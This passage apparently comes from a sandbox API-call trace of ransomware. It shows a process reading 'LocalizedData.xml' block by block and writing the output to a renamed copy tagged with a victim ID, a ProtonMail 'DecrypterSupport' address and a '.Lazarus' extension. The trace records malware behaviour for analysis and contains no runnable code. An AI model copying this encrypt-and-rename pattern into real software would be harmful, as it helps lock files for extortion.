returned 0x418 [0070.793] GetFileType (hFile=0x418) returned 0x1 [0070.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0070.793] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.793] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.793] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.793] CloseHandle (hObject=0x418) returned 1 [0070.793] AreFileApisANSI () returned 1 [0070.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0070.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0070.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.794] GetFileType (hFile=0x418) returned 0x1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0070.794] CloseHandle (hObject=0x418) returned 1 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0070.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.795] AreFileApisANSI () returned 1 [0070.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0070.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0070.795] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70)) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0070.795] AreFileApisANSI () returned 1 [0070.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0070.795] GetLastError () returned 0x0 [0070.795] SetLastError (dwErrCode=0x0) [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0070.795] GetLastError () returned 0x0 [0070.795] SetLastError (dwErrCode=0x0) [0070.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x715b8 [0070.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0070.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0070.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.896] AreFileApisANSI () returned 1 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0070.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0070.896] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0070.904] GetFileType (hFile=0x410) returned 0x1 [0070.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.967] AreFileApisANSI () returned 1 [0070.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0070.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 45 [0070.967] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.967] GetFileType (hFile=0x418) returned 0x1 [0070.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.967] GetLastError () returned 0x0 [0070.967] SetLastError (dwErrCode=0x0) [0070.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.968] GetLastError () returned 0x0 [0070.968] SetLastError (dwErrCode=0x0) [0070.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.970] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0070.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0070.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.973] GetLastError () returned 0x0 [0070.973] SetLastError (dwErrCode=0x0) [0070.973] GetLastError () returned 0x0 [0070.973] SetLastError (dwErrCode=0x0) [0070.973] GetLastError () returned 0x0 [0070.973] SetLastError (dwErrCode=0x0) [0070.973] GetLastError () returned 0x0 [0070.973] SetLastError (dwErrCode=0x0) [0070.974] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.974] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.975] GetLastError () returned 0x0 [0070.975] SetLastError (dwErrCode=0x0) [0070.975] GetLastError () returned 0x0 [0070.975] SetLastError (dwErrCode=0x0) [0070.976] GetLastError () returned 0x0 [0070.976] SetLastError (dwErrCode=0x0) [0070.976] GetLastError () returned 0x0 [0070.976] SetLastError (dwErrCode=0x0) [0070.976] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.976] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.976] GetLastError () returned 0x0 [0070.976] SetLastError (dwErrCode=0x0) [0070.976] GetLastError () returned 0x0 [0070.977] SetLastError (dwErrCode=0x0) [0070.977] GetLastError () returned 0x0 [0070.977] SetLastError (dwErrCode=0x0) [0070.977] GetLastError () returned 0x0 [0070.977] SetLastError (dwErrCode=0x0) [0070.977] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.977] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.978] GetLastError () returned 0x0 [0070.978] SetLastError (dwErrCode=0x0) [0070.978] GetLastError () returned 0x0 [0070.978] SetLastError (dwErrCode=0x0) [0070.978] GetLastError () returned 0x0 [0070.978] SetLastError (dwErrCode=0x0) [0070.978] GetLastError () returned 0x0 [0070.978] SetLastError (dwErrCode=0x0) [0070.978] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.978] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.979] GetLastError () returned 0x0 [0070.979] SetLastError (dwErrCode=0x0) [0070.979] GetLastError () returned 0x0 [0070.979] SetLastError (dwErrCode=0x0) [0070.979] GetLastError () returned 0x0 [0070.979] SetLastError (dwErrCode=0x0) [0070.979] GetLastError () returned 0x0 [0070.979] SetLastError (dwErrCode=0x0) [0070.979] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.980] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.980] GetLastError () returned 0x0 [0070.980] SetLastError (dwErrCode=0x0) [0070.980] GetLastError () returned 0x0 [0070.980] SetLastError (dwErrCode=0x0) [0070.980] GetLastError () returned 0x0 [0070.980] SetLastError (dwErrCode=0x0) [0070.980] GetLastError () returned 0x0 [0070.980] SetLastError (dwErrCode=0x0) [0070.981] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.981] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.981] GetLastError () returned 0x0 [0070.981] SetLastError (dwErrCode=0x0) [0070.981] GetLastError () returned 0x0 [0070.981] SetLastError (dwErrCode=0x0) [0070.981] GetLastError () returned 0x0 [0070.981] SetLastError (dwErrCode=0x0) [0070.981] GetLastError () returned 0x0 [0070.981] SetLastError (dwErrCode=0x0) [0070.982] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.982] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.982] GetLastError () returned 0x0 [0070.982] SetLastError (dwErrCode=0x0) [0070.982] GetLastError () returned 0x0 [0070.982] SetLastError (dwErrCode=0x0) [0070.983] GetLastError () returned 0x0 [0070.983] SetLastError (dwErrCode=0x0) [0070.983] GetLastError () returned 0x0 [0070.983] SetLastError (dwErrCode=0x0) [0070.983] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.983] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.983] GetLastError () returned 0x0 [0070.983] SetLastError (dwErrCode=0x0) [0070.984] GetLastError () returned 0x0 [0070.984] SetLastError (dwErrCode=0x0) [0070.984] GetLastError () returned 0x0 [0070.984] SetLastError (dwErrCode=0x0) [0070.984] GetLastError () returned 0x0 [0070.984] SetLastError (dwErrCode=0x0) [0070.984] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.984] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.985] GetLastError () returned 0x0 [0070.985] SetLastError (dwErrCode=0x0) [0070.985] GetLastError () returned 0x0 [0070.985] SetLastError (dwErrCode=0x0) [0070.985] GetLastError () returned 0x0 [0070.985] SetLastError (dwErrCode=0x0) [0070.985] GetLastError () returned 0x0 [0070.985] SetLastError (dwErrCode=0x0) [0070.985] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.985] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.986] GetLastError () returned 0x0 [0070.986] SetLastError (dwErrCode=0x0) [0070.986] GetLastError () returned 0x0 [0070.986] SetLastError (dwErrCode=0x0) [0070.986] GetLastError () returned 0x0 [0070.986] SetLastError (dwErrCode=0x0) [0070.986] GetLastError () returned 0x0 [0070.986] SetLastError (dwErrCode=0x0) [0070.986] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.986] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.987] GetLastError () returned 0x0 [0070.987] SetLastError (dwErrCode=0x0) [0070.987] GetLastError () returned 0x0 [0070.987] SetLastError (dwErrCode=0x0) [0070.987] GetLastError () returned 0x0 [0070.987] SetLastError (dwErrCode=0x0) [0070.987] GetLastError () returned 0x0 [0070.987] SetLastError (dwErrCode=0x0) [0070.987] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.988] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.988] GetLastError () returned 0x0 [0070.988] SetLastError (dwErrCode=0x0) [0070.988] GetLastError () returned 0x0 [0070.988] SetLastError (dwErrCode=0x0) [0070.988] GetLastError () returned 0x0 [0070.988] SetLastError (dwErrCode=0x0) [0070.988] GetLastError () returned 0x0 [0070.988] SetLastError (dwErrCode=0x0) [0070.988] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.989] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.989] GetLastError () returned 0x0 [0070.989] SetLastError (dwErrCode=0x0) [0070.989] GetLastError () returned 0x0 [0070.989] SetLastError (dwErrCode=0x0) [0070.989] GetLastError () returned 0x0 [0070.989] SetLastError (dwErrCode=0x0) [0070.991] GetLastError () returned 0x0 [0070.991] SetLastError (dwErrCode=0x0) [0070.991] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.991] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.991] GetLastError () returned 0x0 [0070.991] SetLastError (dwErrCode=0x0) [0070.991] GetLastError () returned 0x0 [0070.991] SetLastError (dwErrCode=0x0) [0070.991] GetLastError () returned 0x0 [0070.991] SetLastError (dwErrCode=0x0) [0070.991] GetLastError () returned 0x0 [0070.992] SetLastError (dwErrCode=0x0) [0070.992] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.992] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.992] GetLastError () returned 0x0 [0070.992] SetLastError (dwErrCode=0x0) [0070.992] GetLastError () returned 0x0 [0070.992] SetLastError (dwErrCode=0x0) [0070.992] GetLastError () returned 0x0 [0070.992] SetLastError (dwErrCode=0x0) [0070.992] GetLastError () returned 0x0 [0070.992] SetLastError (dwErrCode=0x0) [0070.994] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.994] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.994] GetLastError () returned 0x0 [0070.994] SetLastError (dwErrCode=0x0) [0070.994] GetLastError () returned 0x0 [0070.994] SetLastError (dwErrCode=0x0) [0070.994] GetLastError () returned 0x0 [0070.994] SetLastError (dwErrCode=0x0) [0070.994] GetLastError () returned 0x0 [0070.994] SetLastError (dwErrCode=0x0) [0070.995] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.995] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.995] GetLastError () returned 0x0 [0070.995] SetLastError 